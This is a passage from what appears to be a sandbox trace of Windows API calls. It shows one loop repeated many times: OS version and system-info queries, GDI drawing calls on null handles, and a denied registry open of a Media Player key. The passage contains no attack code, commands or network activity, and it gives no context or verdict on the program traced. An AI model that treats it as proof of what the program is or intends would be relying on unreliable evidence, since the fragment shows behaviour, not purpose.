lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.161] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.161] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.161] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.161] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.161] BeginPath (hdc=0x0) returned 0 [0088.161] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.161] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.161] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.161] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.161] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.161] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.161] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.161] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.161] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7e0401cd [0088.161] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7c0401d0 [0088.161] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f78 [0088.162] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f79 [0088.162] CombineRgn (hrgnDst=0x1040f78, hrgnSrc1=0x7e0401cd, hrgnSrc2=0x7c0401d0, iMode=1) returned 1 [0088.162] CombineRgn (hrgnDst=0x1040f79, hrgnSrc1=0x7e0401cd, hrgnSrc2=0x7c0401d0, iMode=4) returned 2 [0088.162] CreateSolidBrush (color=0xff) returned 0x2100f77 [0088.162] CreateSolidBrush (color=0xff0000) returned 0x1100f7a [0088.162] DeleteObject (ho=0x1100f7a) returned 1 [0088.162] DeleteObject (ho=0x7c0401d0) returned 1 [0088.162] DeleteObject (ho=0x7e0401cd) returned 1 [0088.162] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.162] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.162] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.162] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.162] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.162] BeginPath (hdc=0x0) returned 0 [0088.162] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.162] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.162] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.162] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.162] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.162] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.162] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.162] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.162] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7d0401d0 [0088.162] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7f0401cd [0088.162] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f7b [0088.162] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f7c [0088.162] CombineRgn (hrgnDst=0x1040f7b, hrgnSrc1=0x7d0401d0, hrgnSrc2=0x7f0401cd, iMode=1) returned 1 [0088.162] CombineRgn (hrgnDst=0x1040f7c, hrgnSrc1=0x7d0401d0, hrgnSrc2=0x7f0401cd, iMode=4) returned 2 [0088.162] CreateSolidBrush (color=0xff) returned 0x2100f7a [0088.162] CreateSolidBrush (color=0xff0000) returned 0x1100f7d [0088.162] DeleteObject (ho=0x1100f7d) returned 1 [0088.162] DeleteObject (ho=0x7f0401cd) returned 1 [0088.162] DeleteObject (ho=0x7d0401d0) returned 1 [0088.162] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.162] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.162] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.162] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.162] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.162] BeginPath (hdc=0x0) returned 0 [0088.162] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.162] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.162] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.163] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.163] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.163] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.163] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.163] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.163] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x800401cd [0088.163] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7e0401d0 [0088.163] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f7e [0088.163] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f7f [0088.163] CombineRgn (hrgnDst=0x1040f7e, hrgnSrc1=0x800401cd, hrgnSrc2=0x7e0401d0, iMode=1) returned 1 [0088.163] CombineRgn (hrgnDst=0x1040f7f, hrgnSrc1=0x800401cd, hrgnSrc2=0x7e0401d0, iMode=4) returned 2 [0088.163] CreateSolidBrush (color=0xff) returned 0x2100f7d [0088.163] CreateSolidBrush (color=0xff0000) returned 0x1100f80 [0088.163] DeleteObject (ho=0x1100f80) returned 1 [0088.163] DeleteObject (ho=0x7e0401d0) returned 1 [0088.163] DeleteObject (ho=0x800401cd) returned 1 [0088.163] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.163] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.163] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.163] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.163] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.163] BeginPath (hdc=0x0) returned 0 [0088.163] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.163] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.163] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.163] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.163] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.163] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.163] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.163] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.163] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7f0401d0 [0088.163] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x810401cd [0088.163] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f81 [0088.163] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f82 [0088.163] CombineRgn (hrgnDst=0x1040f81, hrgnSrc1=0x7f0401d0, hrgnSrc2=0x810401cd, iMode=1) returned 1 [0088.163] CombineRgn (hrgnDst=0x1040f82, hrgnSrc1=0x7f0401d0, hrgnSrc2=0x810401cd, iMode=4) returned 2 [0088.163] CreateSolidBrush (color=0xff) returned 0x2100f80 [0088.164] CreateSolidBrush (color=0xff0000) returned 0x1100f83 [0088.164] DeleteObject (ho=0x1100f83) returned 1 [0088.164] DeleteObject (ho=0x810401cd) returned 1 [0088.164] DeleteObject (ho=0x7f0401d0) returned 1 [0088.164] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.164] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.164] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.164] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.164] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.164] BeginPath (hdc=0x0) returned 0 [0088.164] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.164] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.164] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.164] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.164] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.164] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.164] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.164] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.164] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x820401cd [0088.164] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x800401d0 [0088.164] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f84 [0088.164] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f85 [0088.164] CombineRgn (hrgnDst=0x1040f84, hrgnSrc1=0x820401cd, hrgnSrc2=0x800401d0, iMode=1) returned 1 [0088.164] CombineRgn (hrgnDst=0x1040f85, hrgnSrc1=0x820401cd, hrgnSrc2=0x800401d0, iMode=4) returned 2 [0088.164] CreateSolidBrush (color=0xff) returned 0x2100f83 [0088.164] CreateSolidBrush (color=0xff0000) returned 0x1100f86 [0088.164] DeleteObject (ho=0x1100f86) returned 1 [0088.164] DeleteObject (ho=0x800401d0) returned 1 [0088.164] DeleteObject (ho=0x820401cd) returned 1 [0088.164] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.164] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.164] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.164] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.164] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.164] BeginPath (hdc=0x0) returned 0 [0088.164] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.164] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.164] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.164] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.164] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.164] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.165] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.165] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.165] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x810401d0 [0088.165] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x830401cd [0088.165] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f87 [0088.165] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f88 [0088.165] CombineRgn (hrgnDst=0x1040f87, hrgnSrc1=0x810401d0, hrgnSrc2=0x830401cd, iMode=1) returned 1 [0088.165] CombineRgn (hrgnDst=0x1040f88, hrgnSrc1=0x810401d0, hrgnSrc2=0x830401cd, iMode=4) returned 2 [0088.165] CreateSolidBrush (color=0xff) returned 0x2100f86 [0088.165] CreateSolidBrush (color=0xff0000) returned 0x1100f89 [0088.165] DeleteObject (ho=0x1100f89) returned 1 [0088.165] DeleteObject (ho=0x830401cd) returned 1 [0088.165] DeleteObject (ho=0x810401d0) returned 1 [0088.165] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.165] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.165] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.165] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.165] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.165] BeginPath (hdc=0x0) returned 0 [0088.165] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.165] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.165] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.165] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.165] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.165] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.165] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.165] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.165] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x840401cd [0088.165] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x820401d0 [0088.165] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f8a [0088.165] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f8b [0088.165] CombineRgn (hrgnDst=0x1040f8a, hrgnSrc1=0x840401cd, hrgnSrc2=0x820401d0, iMode=1) returned 1 [0088.165] CombineRgn (hrgnDst=0x1040f8b, hrgnSrc1=0x840401cd, hrgnSrc2=0x820401d0, iMode=4) returned 2 [0088.165] CreateSolidBrush (color=0xff) returned 0x2100f89 [0088.165] CreateSolidBrush (color=0xff0000) returned 0x1100f8c [0088.165] DeleteObject (ho=0x1100f8c) returned 1 [0088.165] DeleteObject (ho=0x820401d0) returned 1 [0088.165] DeleteObject (ho=0x840401cd) returned 1 [0088.166] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.166] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.166] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.166] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.166] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.166] BeginPath (hdc=0x0) returned 0 [0088.166] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.166] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.166] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.166] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.166] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.166] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.166] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.166] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.199] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x830401d0 [0088.199] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x850401cd [0088.199] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041023 [0088.199] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041024 [0088.199] CombineRgn (hrgnDst=0x1041023, hrgnSrc1=0x830401d0, hrgnSrc2=0x850401cd, iMode=1) returned 1 [0088.199] CombineRgn (hrgnDst=0x1041024, hrgnSrc1=0x830401d0, hrgnSrc2=0x850401cd, iMode=4) returned 2 [0088.199] CreateSolidBrush (color=0xff) returned 0x2100f8c [0088.199] CreateSolidBrush (color=0xff0000) returned 0x1101025 [0088.199] DeleteObject (ho=0x1101025) returned 1 [0088.199] DeleteObject (ho=0x850401cd) returned 1 [0088.199] DeleteObject (ho=0x830401d0) returned 1 [0088.199] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.199] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.199] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.199] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.199] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.199] BeginPath (hdc=0x0) returned 0 [0088.199] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.199] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.199] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.199] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.199] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.199] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.199] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.199] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.199] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x860401cd [0088.199] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x840401d0 [0088.199] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041026 [0088.199] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041027 [0088.200] CombineRgn (hrgnDst=0x1041026, hrgnSrc1=0x860401cd, hrgnSrc2=0x840401d0, iMode=1) returned 1 [0088.200] CombineRgn (hrgnDst=0x1041027, hrgnSrc1=0x860401cd, hrgnSrc2=0x840401d0, iMode=4) returned 2 [0088.200] CreateSolidBrush (color=0xff) returned 0x2101025 [0088.200] CreateSolidBrush (color=0xff0000) returned 0x1101028 [0088.200] DeleteObject (ho=0x1101028) returned 1 [0088.200] DeleteObject (ho=0x840401d0) returned 1 [0088.200] DeleteObject (ho=0x860401cd) returned 1 [0088.200] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.200] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.200] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.200] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.200] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.200] BeginPath 